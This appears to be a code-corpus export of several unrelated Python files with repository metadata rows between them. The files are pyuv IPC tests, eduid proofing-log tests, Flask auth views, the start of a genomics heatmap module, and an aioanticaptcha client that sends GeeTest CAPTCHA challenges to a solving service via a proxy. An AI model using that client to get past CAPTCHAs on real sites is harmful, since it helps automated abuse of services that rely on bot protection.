stdio = [pyuv.StdIO(stream=self.channel, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE|pyuv.UV_WRITABLE_PIPE)]
proc = pyuv.Process(self.loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", " proc_ipc.py", "listen_after_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
else:
proc.spawn(file=sys.executable, args=["proc_ipc.py", "listen_after_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
self.channel.start_read2(self.on_channel_read)
self.loop.run()
@platform_skip(["win32"])
class IPCSendRecvTest(unittest2.TestCase):
def setUp(self):
self.loop = pyuv.Loop.default_loop()
def proc_exit_cb(self, proc, exit_status, term_signal):
proc.close()
def on_channel_read(self, handle, data, pending, error):
self.assertEqual(pending, pyuv.UV_NAMED_PIPE)
self.recv_pipe = pyuv.Pipe(self.loop)
self.channel.accept(self.recv_pipe)
self.channel.close()
self.send_pipe.close()
self.recv_pipe.close()
def test_ipc_send_recv(self):
# Handle that will be sent to the process and back
self.send_pipe = pyuv.Pipe(self.loop, True)
self.send_pipe.bind(TEST_PIPE)
self.channel = pyuv.Pipe(self.loop, True)
stdio = [pyuv.StdIO(stream=self.channel, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE|pyuv.UV_WRITABLE_PIPE)]
proc = pyuv.Process(self.loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", " proc_ipc_echo.py"], exit_callback=self.proc_exit_cb, stdio=stdio)
else:
proc.spawn(file=sys.executable, args=["proc_ipc_echo.py"], exit_callback=self.proc_exit_cb, stdio=stdio)
self.channel.write2(b".", self.send_pipe)
self.channel.start_read2(self.on_channel_read)
self.loop.run()
if __name__ == '__main__':
unittest2.main(verbosity=2)
| 37.165289
| 136
| 0.648655
|
import sys
from common import unittest2, platform_skip
import pyuv
TEST_PORT = 1234
if sys.platform == 'win32':
TEST_PIPE = '\\\\.\\pipe\\test-pipe'
else:
TEST_PIPE = 'test-pipe'
@platform_skip(["win32"])
class IPCTest(unittest2.TestCase):
def setUp(self):
self.loop = pyuv.Loop.default_loop()
def proc_exit_cb(self, proc, exit_status, term_signal):
proc.close()
def on_client_connection(self, client, error):
client.close()
self.connections.remove(client)
def make_many_connections(self):
for i in range(100):
conn = pyuv.TCP(self.loop)
self.connections.append(conn)
conn.connect(("127.0.0.1", TEST_PORT), self.on_client_connection)
def on_ipc_connection(self, handle, error):
if self.local_conn_accepted:
return
conn = pyuv.TCP(self.loop)
self.tcp_server.accept(conn)
conn.close()
self.tcp_server.close()
self.local_conn_accepted = True
def on_channel_read(self, handle, data, pending, error):
if self.tcp_server is None:
self.assertEqual(pending, pyuv.UV_TCP)
self.tcp_server = pyuv.TCP(self.loop)
self.channel.accept(self.tcp_server)
self.tcp_server.listen(self.on_ipc_connection, 12)
self.assertEqual(data.strip(), b"hello")
self.channel.write(b"world")
self.make_many_connections()
else:
if data.strip() == b"accepted_connection":
self.assertEqual(pending, pyuv.UV_UNKNOWN_HANDLE)
self.channel.close()
def test_ipc1(self):
self.connections = []
self.local_conn_accepted = False
self.tcp_server = None
self.channel = pyuv.Pipe(self.loop, True)
stdio = [pyuv.StdIO(stream=self.channel, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE|pyuv.UV_WRITABLE_PIPE)]
proc = pyuv.Process(self.loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", " proc_ipc.py", "listen_before_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
else:
proc.spawn(file=sys.executable , args=["proc_ipc.py", "listen_before_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
self.channel.start_read2(self.on_channel_read)
self.loop.run()
def test_ipc2(self):
self.connections = []
self.local_conn_accepted = False
self.tcp_server = None
self.channel = pyuv.Pipe(self.loop, True)
stdio = [pyuv.StdIO(stream=self.channel, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE|pyuv.UV_WRITABLE_PIPE)]
proc = pyuv.Process(self.loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", " proc_ipc.py", "listen_after_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
else:
proc.spawn(file=sys.executable, args=["proc_ipc.py", "listen_after_write"], exit_callback=self.proc_exit_cb, stdio=stdio)
self.channel.start_read2(self.on_channel_read)
self.loop.run()
@platform_skip(["win32"])
class IPCSendRecvTest(unittest2.TestCase):
def setUp(self):
self.loop = pyuv.Loop.default_loop()
def proc_exit_cb(self, proc, exit_status, term_signal):
proc.close()
def on_channel_read(self, handle, data, pending, error):
self.assertEqual(pending, pyuv.UV_NAMED_PIPE)
self.recv_pipe = pyuv.Pipe(self.loop)
self.channel.accept(self.recv_pipe)
self.channel.close()
self.send_pipe.close()
self.recv_pipe.close()
def test_ipc_send_recv(self):
self.send_pipe = pyuv.Pipe(self.loop, True)
self.send_pipe.bind(TEST_PIPE)
self.channel = pyuv.Pipe(self.loop, True)
stdio = [pyuv.StdIO(stream=self.channel, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE|pyuv.UV_WRITABLE_PIPE)]
proc = pyuv.Process(self.loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", " proc_ipc_echo.py"], exit_callback=self.proc_exit_cb, stdio=stdio)
else:
proc.spawn(file=sys.executable, args=["proc_ipc_echo.py"], exit_callback=self.proc_exit_cb, stdio=stdio)
self.channel.write2(b".", self.send_pipe)
self.channel.start_read2(self.on_channel_read)
self.loop.run()
if __name__ == '__main__':
unittest2.main(verbosity=2)
| true
| true
|
790b035b77f1a16e7ef28d292d46cfac5ec2ace2
| 11,257
|
py
|
Python
|
src/eduid_userdb/tests/test_logs.py
|
SUNET/eduid-userdb
|
5970880caf0b0e2bdee6c23869ef287acc87af2a
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
src/eduid_userdb/tests/test_logs.py
|
SUNET/eduid-userdb
|
5970880caf0b0e2bdee6c23869ef287acc87af2a
|
[
"BSD-2-Clause-FreeBSD"
] | 12
|
2015-08-28T12:05:32.000Z
|
2020-06-23T13:31:29.000Z
|
src/eduid_userdb/tests/test_logs.py
|
SUNET/eduid-userdb
|
5970880caf0b0e2bdee6c23869ef287acc87af2a
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2016-10-24T06:37:33.000Z
|
2016-11-21T11:39:39.000Z
|
# -*- coding: utf-8 -*-
from copy import deepcopy
from unittest import TestCase
from eduid_userdb.fixtures.users import mocked_user_standard
from eduid_userdb.logs.db import ProofingLog
from eduid_userdb.logs.element import (
LetterProofing,
MailAddressProofing,
PhoneNumberProofing,
ProofingLogElement,
SeLegProofing,
SeLegProofingFrejaEid,
TeleAdressProofing,
TeleAdressProofingRelation,
)
from eduid_userdb.testing import MongoTemporaryInstance
from eduid_userdb.user import User
__author__ = 'lundberg'
class TestProofingLog(TestCase):
def setUp(self):
self.tmp_db = MongoTemporaryInstance.get_instance()
self.proofing_log_db = ProofingLog(db_uri=self.tmp_db.uri)
self.user = User.from_dict(mocked_user_standard.to_dict())
def tearDown(self):
self.proofing_log_db._drop_whole_collection()
def test_id_proofing_data(self):
proofing_element = ProofingLogElement(
eppn=self.user.eppn, created_by='test', proofing_method='test', proofing_version='test'
)
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['proofing_method'], 'test')
def test_teleadress_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'reason': 'matched',
'nin': 'some_nin',
'mobile_number': 'some_mobile_number',
'user_postal_address': {'response_data': {'some': 'data'}},
'proofing_version': 'test',
}
proofing_element = TeleAdressProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['reason'], 'matched')
self.assertEqual(hit['proofing_method'], 'TeleAdress')
self.assertEqual(hit['proofing_version'], 'test')
def test_teleadress_proofing_relation(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'reason': 'matched_by_navet',
'nin': 'some_nin',
'mobile_number': 'some_mobile_number',
'user_postal_address': {'response_data': {'some': 'data'}},
'mobile_number_registered_to': 'registered_national_identity_number',
'registered_relation': 'registered_relation_to_user',
'registered_postal_address': {'response_data': {'some': 'data'}},
'proofing_version': 'test',
}
proofing_element = TeleAdressProofingRelation(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['reason'], 'matched_by_navet')
self.assertEqual(hit['proofing_method'], 'TeleAdress')
self.assertEqual(hit['proofing_version'], 'test')
def test_letter_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'nin': 'some_nin',
'letter_sent_to': {'name': {'some': 'data'}, 'address': {'some': 'data'}},
'transaction_id': 'some transaction id',
'user_postal_address': {'response_data': {'some': 'data'}},
'proofing_version': 'test',
}
proofing_element = LetterProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertIsNotNone(hit['letter_sent_to'])
self.assertIsNotNone(hit['transaction_id'])
self.assertEqual(hit['proofing_method'], 'letter')
self.assertEqual(hit['proofing_version'], 'test')
def test_mail_address_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'mail_address': 'some_mail_address',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = MailAddressProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['proofing_method'], 'e-mail')
self.assertEqual(hit['mail_address'], 'some_mail_address')
def test_phone_number_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'phone_number': 'some_phone_number',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = PhoneNumberProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['proofing_method'], 'sms')
self.assertEqual(hit['phone_number'], 'some_phone_number')
self.assertEqual(hit['proofing_version'], 'test')
def test_se_leg_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'proofing_version': 'test',
'nin': 'national_identity_number',
'vetting_by': 'provider',
'transaction_id': 'transaction_id',
'user_postal_address': {'response_data': {'some': 'data'}},
}
proofing_element = SeLegProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertIsNotNone(hit['nin'])
self.assertIsNotNone(hit['user_postal_address'])
self.assertEqual(hit['vetting_by'], 'provider')
self.assertEqual(hit['transaction_id'], 'transaction_id')
self.assertEqual(hit['proofing_method'], 'se-leg')
self.assertEqual(hit['proofing_version'], 'test')
def test_se_leg_proofing_freja(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'proofing_version': 'test',
'nin': 'national_identity_number',
'transaction_id': 'transaction_id',
'opaque_data': 'some data',
'user_postal_address': {'response_data': {'some': 'data'}},
}
proofing_element = SeLegProofingFrejaEid(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertIsNotNone(hit['nin'])
self.assertIsNotNone(hit['user_postal_address'])
self.assertEqual(hit['vetting_by'], 'Freja eID')
self.assertEqual(hit['transaction_id'], 'transaction_id')
self.assertEqual(hit['opaque_data'], 'some data')
self.assertEqual(hit['proofing_method'], 'se-leg')
self.assertEqual(hit['proofing_version'], 'test')
def test_blank_string_proofing_data(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'phone_number': 'some_phone_number',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = PhoneNumberProofing(**data)
proofing_element.phone_number = ''
self.assertFalse(self.proofing_log_db.save(proofing_element))
def test_boolean_false_proofing_data(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'phone_number': 'some_phone_number',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = PhoneNumberProofing(**data)
proofing_element.phone_number = 0
self.assertTrue(self.proofing_log_db.save(proofing_element))
proofing_element = PhoneNumberProofing(**data)
proofing_element.phone_number = False
self.assertTrue(self.proofing_log_db.save(proofing_element))
| 40.203571
| 99
| 0.616416
|
from copy import deepcopy
from unittest import TestCase
from eduid_userdb.fixtures.users import mocked_user_standard
from eduid_userdb.logs.db import ProofingLog
from eduid_userdb.logs.element import (
LetterProofing,
MailAddressProofing,
PhoneNumberProofing,
ProofingLogElement,
SeLegProofing,
SeLegProofingFrejaEid,
TeleAdressProofing,
TeleAdressProofingRelation,
)
from eduid_userdb.testing import MongoTemporaryInstance
from eduid_userdb.user import User
__author__ = 'lundberg'
class TestProofingLog(TestCase):
def setUp(self):
self.tmp_db = MongoTemporaryInstance.get_instance()
self.proofing_log_db = ProofingLog(db_uri=self.tmp_db.uri)
self.user = User.from_dict(mocked_user_standard.to_dict())
def tearDown(self):
self.proofing_log_db._drop_whole_collection()
def test_id_proofing_data(self):
proofing_element = ProofingLogElement(
eppn=self.user.eppn, created_by='test', proofing_method='test', proofing_version='test'
)
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['proofing_method'], 'test')
def test_teleadress_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'reason': 'matched',
'nin': 'some_nin',
'mobile_number': 'some_mobile_number',
'user_postal_address': {'response_data': {'some': 'data'}},
'proofing_version': 'test',
}
proofing_element = TeleAdressProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['reason'], 'matched')
self.assertEqual(hit['proofing_method'], 'TeleAdress')
self.assertEqual(hit['proofing_version'], 'test')
def test_teleadress_proofing_relation(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'reason': 'matched_by_navet',
'nin': 'some_nin',
'mobile_number': 'some_mobile_number',
'user_postal_address': {'response_data': {'some': 'data'}},
'mobile_number_registered_to': 'registered_national_identity_number',
'registered_relation': 'registered_relation_to_user',
'registered_postal_address': {'response_data': {'some': 'data'}},
'proofing_version': 'test',
}
proofing_element = TeleAdressProofingRelation(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['reason'], 'matched_by_navet')
self.assertEqual(hit['proofing_method'], 'TeleAdress')
self.assertEqual(hit['proofing_version'], 'test')
def test_letter_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'nin': 'some_nin',
'letter_sent_to': {'name': {'some': 'data'}, 'address': {'some': 'data'}},
'transaction_id': 'some transaction id',
'user_postal_address': {'response_data': {'some': 'data'}},
'proofing_version': 'test',
}
proofing_element = LetterProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertIsNotNone(hit['letter_sent_to'])
self.assertIsNotNone(hit['transaction_id'])
self.assertEqual(hit['proofing_method'], 'letter')
self.assertEqual(hit['proofing_version'], 'test')
def test_mail_address_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'mail_address': 'some_mail_address',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = MailAddressProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['proofing_method'], 'e-mail')
self.assertEqual(hit['mail_address'], 'some_mail_address')
def test_phone_number_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'phone_number': 'some_phone_number',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = PhoneNumberProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertEqual(hit['proofing_method'], 'sms')
self.assertEqual(hit['phone_number'], 'some_phone_number')
self.assertEqual(hit['proofing_version'], 'test')
def test_se_leg_proofing(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'proofing_version': 'test',
'nin': 'national_identity_number',
'vetting_by': 'provider',
'transaction_id': 'transaction_id',
'user_postal_address': {'response_data': {'some': 'data'}},
}
proofing_element = SeLegProofing(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertIsNotNone(hit['nin'])
self.assertIsNotNone(hit['user_postal_address'])
self.assertEqual(hit['vetting_by'], 'provider')
self.assertEqual(hit['transaction_id'], 'transaction_id')
self.assertEqual(hit['proofing_method'], 'se-leg')
self.assertEqual(hit['proofing_version'], 'test')
def test_se_leg_proofing_freja(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'proofing_version': 'test',
'nin': 'national_identity_number',
'transaction_id': 'transaction_id',
'opaque_data': 'some data',
'user_postal_address': {'response_data': {'some': 'data'}},
}
proofing_element = SeLegProofingFrejaEid(**data)
for key, value in data.items():
if key == 'eppn':
continue
self.assertIn(key, proofing_element.to_dict())
self.assertEqual(value, proofing_element.to_dict().get(key))
self.proofing_log_db.save(proofing_element)
result = list(self.proofing_log_db._coll.find({}))
self.assertEqual(len(result), 1)
hit = result[0]
self.assertEqual(hit['eduPersonPrincipalName'], self.user.eppn)
self.assertEqual(hit['created_by'], 'test')
self.assertIsNotNone(hit['created_ts'])
self.assertIsNotNone(hit['nin'])
self.assertIsNotNone(hit['user_postal_address'])
self.assertEqual(hit['vetting_by'], 'Freja eID')
self.assertEqual(hit['transaction_id'], 'transaction_id')
self.assertEqual(hit['opaque_data'], 'some data')
self.assertEqual(hit['proofing_method'], 'se-leg')
self.assertEqual(hit['proofing_version'], 'test')
def test_blank_string_proofing_data(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'phone_number': 'some_phone_number',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = PhoneNumberProofing(**data)
proofing_element.phone_number = ''
self.assertFalse(self.proofing_log_db.save(proofing_element))
def test_boolean_false_proofing_data(self):
data = {
'eppn': self.user.eppn,
'created_by': 'test',
'phone_number': 'some_phone_number',
'proofing_version': 'test',
'reference': 'reference id',
}
proofing_element = PhoneNumberProofing(**data)
proofing_element.phone_number = 0
self.assertTrue(self.proofing_log_db.save(proofing_element))
proofing_element = PhoneNumberProofing(**data)
proofing_element.phone_number = False
self.assertTrue(self.proofing_log_db.save(proofing_element))
| true
| true
|
790b036e68901d1876285f11feba3daadc8966dd
| 1,795
|
py
|
Python
|
aioanticaptcha/geetestproxyon.py
|
andrersp/aioanticaptcha
|
a9ec56ecd75371c9efed87eb874c3276b60e5461
|
[
"MIT"
] | null | null | null |
aioanticaptcha/geetestproxyon.py
|
andrersp/aioanticaptcha
|
a9ec56ecd75371c9efed87eb874c3276b60e5461
|
[
"MIT"
] | null | null | null |
aioanticaptcha/geetestproxyon.py
|
andrersp/aioanticaptcha
|
a9ec56ecd75371c9efed87eb874c3276b60e5461
|
[
"MIT"
] | null | null | null |
from aioanticaptcha.antinetworking import *
import asyncio
class geetestProxyon(antiNetworking):
js_api_domain = ""
gt = ""
challenge = ""
geetest_lib = ""
async def solve_and_return_solution(self):
if (
await self.create_task(
{
"clientKey": self.client_key,
"task": {
"type": "GeeTestTask",
"websiteURL": self.website_url,
"gt": self.gt,
"challenge": self.challenge,
"geetestApiServerSubdomain": self.js_api_domain,
"geetestGetLib": self.geetest_lib,
"proxyType": self.proxy_type,
"proxyAddress": self.proxy_address,
"proxyPort": self.proxy_port,
"proxyLogin": self.proxy_login,
"proxyPassword": self.proxy_password,
"userAgent": self.user_agent,
},
}
)
== 1
):
self.log("created task with id " + str(self.task_id))
else:
self.log("could not create task")
self.log(self.err_string)
return 0
# checking result
await asyncio.sleep(3)
task_result = self.wait_for_result(600)
if task_result == 0:
return 0
else:
return task_result["solution"]
def set_gt_key(self, value):
self.gt = value
def set_challenge_key(self, value):
self.challenge = value
def set_js_api_domain(self, value):
self.js_api_domain = value
def set_geetest_lib(self, value):
self.geetest_lib = value
| 30.423729
| 72
| 0.494708
|
from aioanticaptcha.antinetworking import *
import asyncio
class geetestProxyon(antiNetworking):
js_api_domain = ""
gt = ""
challenge = ""
geetest_lib = ""
async def solve_and_return_solution(self):
if (
await self.create_task(
{
"clientKey": self.client_key,
"task": {
"type": "GeeTestTask",
"websiteURL": self.website_url,
"gt": self.gt,
"challenge": self.challenge,
"geetestApiServerSubdomain": self.js_api_domain,
"geetestGetLib": self.geetest_lib,
"proxyType": self.proxy_type,
"proxyAddress": self.proxy_address,
"proxyPort": self.proxy_port,
"proxyLogin": self.proxy_login,
"proxyPassword": self.proxy_password,
"userAgent": self.user_agent,
},
}
)
== 1
):
self.log("created task with id " + str(self.task_id))
else:
self.log("could not create task")
self.log(self.err_string)
return 0
await asyncio.sleep(3)
task_result = self.wait_for_result(600)
if task_result == 0:
return 0
else:
return task_result["solution"]
def set_gt_key(self, value):
self.gt = value
def set_challenge_key(self, value):
self.challenge = value
def set_js_api_domain(self, value):
self.js_api_domain = value
def set_geetest_lib(self, value):
self.geetest_lib = value
| true
| true
|
790b038deca2b72154b1317ed77167b94ea5b07b
| 1,373
|
py
|
Python
|
app/auth/views.py
|
mwerumuchai/jukebox
|
eb6e7e94fb4a228e3b66477ca2ed0fcbe4c44691
|
[
"MIT"
] | null | null | null |
app/auth/views.py
|
mwerumuchai/jukebox
|
eb6e7e94fb4a228e3b66477ca2ed0fcbe4c44691
|
[
"MIT"
] | null | null | null |
app/auth/views.py
|
mwerumuchai/jukebox
|
eb6e7e94fb4a228e3b66477ca2ed0fcbe4c44691
|
[
"MIT"
] | 2
|
2018-10-26T20:08:04.000Z
|
2020-07-23T22:08:43.000Z
|
from flask import render_template,redirect,url_for,request,flash
from . import auth
from ..models import Group
from .forms import RegistrationForm,LoginForm
from .. import db
from flask_login import login_user,logout_user,login_required
@auth.route('/login', methods=["GET", "POST"])
def login():
login_form = LoginForm()
if login_form.validate_on_submit():
group = Group.query.filter_by( name=login_form.name.data).first()
if group is not None and group.verify_password(login_form.password.data):
login_user(group, login_form.remember.data)
return redirect(request.args.get('next') or url_for('main.group', id=group.id))
flash('Invalid group name or password')
title="Login"
return render_template('auth/login.html', login_form=login_form, title=title)
@auth.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for("main.index"))
@auth.route('/register', methods=["GET", "POST"])
def register():
form = RegistrationForm()
if form.validate_on_submit():
group = Group( name=form.name.data, password=form.password.data)
db.session.add(group)
db.session.commit()
return redirect(url_for('auth.login'))
title="New Account"
return render_template('auth/register.html', registration_form=form, title=title)
| 24.517857
| 91
| 0.697742
|
from flask import render_template,redirect,url_for,request,flash
from . import auth
from ..models import Group
from .forms import RegistrationForm,LoginForm
from .. import db
from flask_login import login_user,logout_user,login_required
@auth.route('/login', methods=["GET", "POST"])
def login():
login_form = LoginForm()
if login_form.validate_on_submit():
group = Group.query.filter_by( name=login_form.name.data).first()
if group is not None and group.verify_password(login_form.password.data):
login_user(group, login_form.remember.data)
return redirect(request.args.get('next') or url_for('main.group', id=group.id))
flash('Invalid group name or password')
title="Login"
return render_template('auth/login.html', login_form=login_form, title=title)
@auth.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for("main.index"))
@auth.route('/register', methods=["GET", "POST"])
def register():
form = RegistrationForm()
if form.validate_on_submit():
group = Group( name=form.name.data, password=form.password.data)
db.session.add(group)
db.session.commit()
return redirect(url_for('auth.login'))
title="New Account"
return render_template('auth/register.html', registration_form=form, title=title)
| true
| true
|
790b052bd7820426511155774e42497715bf9ea3
| 9,377
|
py
|
Python
|
genecast_package/core.py
|
861934367/genecast
|
b4c5710aef526f4e3bdf0ba3594dab583068eca3
|
[
"Apache-2.0"
] | null | null | null |
genecast_package/core.py
|
861934367/genecast
|
b4c5710aef526f4e3bdf0ba3594dab583068eca3
|
[
"Apache-2.0"
] | null | null | null |
genecast_package/core.py
|
861934367/genecast
|
b4c5710aef526f4e3bdf0ba3594dab583068eca3
|
[
"Apache-2.0"
] | null | null | null |
## this tool is the core function of cnv and snv analysis
## author: taozhou
## email: zhou.tao@genecast.com.cn
import matplotlib as mpl
mpl.use('Agg')
import warnings
warnings.filterwarnings("ignore")
import itertools
import seaborn as sns
import matplotlib.pylab as plt
import matplotlib.colors as mc
from genecast_package.svm_analysis import feature_select, evaluate_model
from sklearn.decomposition import PCA
from collections import OrderedDict
from collections import defaultdict
import datetime
import pandas as pd
from scipy.stats import ranksums
import os
import sh
import warnings
warnings.filterwarnings("ignore")
def z_score(data, axis):
if axis == 3:
return data
if axis == 1:
z_scored = data
else:
z_scored = data.T
z_scored = (z_scored - z_scored.mean()) / z_scored.std()
if axis == 1:
return z_scored
else:
return z_scored.T
def pheatmap(data, length, col_cluster=True, xticklabels=True, yticklabels=True, color=None, name=None, args=None):
data = z_score(data, axis=args.z_score)
if len(data.columns) > 30:
xticklabels = False
if len(data) > 80:
yticklabels = False
vmin, vmax = data.unstack().quantile([.05, .95])
if args.z_score == 3:
vmin, vmax = 0, 4
re = sns.clustermap(data, cmap=args.cmp, row_cluster=True, method=args.cluster_method, col_cluster=col_cluster, figsize=(13, 10), \
